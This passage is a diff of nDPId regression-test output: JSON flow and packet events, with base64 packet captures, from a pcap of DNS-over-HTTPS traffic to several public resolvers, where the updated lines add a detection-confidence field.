+00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="}
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"}
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7440000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7440000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 03841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eY